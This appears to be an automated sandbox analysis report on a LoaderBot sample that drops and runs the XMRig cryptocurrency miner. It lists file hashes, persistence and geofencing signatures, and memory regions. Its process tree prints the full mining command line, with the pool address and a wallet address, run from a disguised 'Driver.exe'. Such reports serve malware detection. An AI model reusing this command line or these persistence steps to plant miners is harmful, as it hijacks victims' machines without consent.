Analysis

  • max time kernel
    56s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-05-2023 20:34

General

  • Target

    e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe

  • Size

    4.0MB

  • MD5

    c582001fd00152425fd1a4b9b0d7cf07

  • SHA1

    f747b7074505e37b589b72e652778c59077c1151

  • SHA256

    e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467

  • SHA512

    72e6993227acc1b5f4841bfe04030ec70d061ce3ac1512b93e05f9900445253f0ca71917469616210881c61f711aaae1f58eedbef8903e1627fc720f8283bcce

  • SSDEEP

    49152:EjNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:ERzP88fBsnZTgOtqB3m1RC3

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • LoaderBot executable 1 IoCs
  • XMRig Miner payload 20 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe
    "C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: RenamesItself
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4296
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 2
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:64
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 64 -s 760
        3⤵
        • Program crash
        PID:1952
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 2
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1932
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 1932 -s 856
        3⤵
        • Program crash
        PID:3392
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 2
      2⤵
        PID:2144
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2144 -s 864
          3⤵
          • Program crash
          PID:2964
      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 2
        2⤵
          PID:1040
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -pss -s 208 -p 64 -ip 64
        1⤵
          PID:4392
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 444 -p 1932 -ip 1932
          1⤵
            PID:2600
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -pss -s 460 -p 2144 -ip 2144
            1⤵
              PID:3972

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

              Filesize

              3.9MB

              MD5

              02569a7a91a71133d4a1023bf32aa6f4

              SHA1

              0f16bcb3f3f085d3d3be912195558e9f9680d574

              SHA256

              8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

              SHA512

              534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

              Filesize

              3.9MB

              MD5

              02569a7a91a71133d4a1023bf32aa6f4

              SHA1

              0f16bcb3f3f085d3d3be912195558e9f9680d574

              SHA256

              8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

              SHA512

              534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

              Filesize

              3.9MB

              MD5

              02569a7a91a71133d4a1023bf32aa6f4

              SHA1

              0f16bcb3f3f085d3d3be912195558e9f9680d574

              SHA256

              8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

              SHA512

              534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

              Filesize

              3.9MB

              MD5

              02569a7a91a71133d4a1023bf32aa6f4

              SHA1

              0f16bcb3f3f085d3d3be912195558e9f9680d574

              SHA256

              8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

              SHA512

              534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

              Filesize

              3.9MB

              MD5

              02569a7a91a71133d4a1023bf32aa6f4

              SHA1

              0f16bcb3f3f085d3d3be912195558e9f9680d574

              SHA256

              8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

              SHA512

              534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

              Filesize

              3.9MB

              MD5

              02569a7a91a71133d4a1023bf32aa6f4

              SHA1

              0f16bcb3f3f085d3d3be912195558e9f9680d574

              SHA256

              8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

              SHA512

              534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

            • memory/64-148-0x00000000004D0000-0x00000000004E4000-memory.dmp

              Filesize

              80KB

            • memory/64-149-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/64-150-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1040-190-0x0000000000510000-0x0000000000530000-memory.dmp

              Filesize

              128KB

            • memory/1040-191-0x0000000000530000-0x0000000000550000-memory.dmp

              Filesize

              128KB

            • memory/1040-189-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1040-188-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1040-187-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1932-165-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1932-158-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1932-159-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1932-160-0x0000000000510000-0x0000000000530000-memory.dmp

              Filesize

              128KB

            • memory/1932-161-0x0000000001FD0000-0x0000000001FF0000-memory.dmp

              Filesize

              128KB

            • memory/1932-162-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1932-163-0x0000000000510000-0x0000000000530000-memory.dmp

              Filesize

              128KB

            • memory/1932-164-0x0000000001FD0000-0x0000000001FF0000-memory.dmp

              Filesize

              128KB

            • memory/1932-153-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1932-166-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1932-167-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1932-168-0x0000000000510000-0x0000000000530000-memory.dmp

              Filesize

              128KB

            • memory/1932-169-0x0000000001FD0000-0x0000000001FF0000-memory.dmp

              Filesize

              128KB

            • memory/1932-157-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/1932-154-0x00000000004F0000-0x0000000000510000-memory.dmp

              Filesize

              128KB

            • memory/1932-156-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/2144-175-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/2144-183-0x0000000000510000-0x0000000000530000-memory.dmp

              Filesize

              128KB

            • memory/2144-176-0x0000000000510000-0x0000000000530000-memory.dmp

              Filesize

              128KB

            • memory/2144-177-0x0000000000530000-0x0000000000550000-memory.dmp

              Filesize

              128KB

            • memory/2144-178-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/2144-179-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/2144-180-0x0000000000510000-0x0000000000530000-memory.dmp

              Filesize

              128KB

            • memory/2144-181-0x0000000000530000-0x0000000000550000-memory.dmp

              Filesize

              128KB

            • memory/2144-182-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/2144-174-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/2144-184-0x0000000000530000-0x0000000000550000-memory.dmp

              Filesize

              128KB

            • memory/2144-173-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/2144-172-0x0000000140000000-0x0000000140B75000-memory.dmp

              Filesize

              11.5MB

            • memory/4296-155-0x0000000005D10000-0x0000000005D20000-memory.dmp

              Filesize

              64KB

            • memory/4296-133-0x0000000000EE0000-0x00000000012DE000-memory.dmp

              Filesize

              4.0MB

            • memory/4296-137-0x0000000005D10000-0x0000000005D20000-memory.dmp

              Filesize

              64KB

            • memory/4296-136-0x0000000005FC0000-0x0000000006026000-memory.dmp

              Filesize

              408KB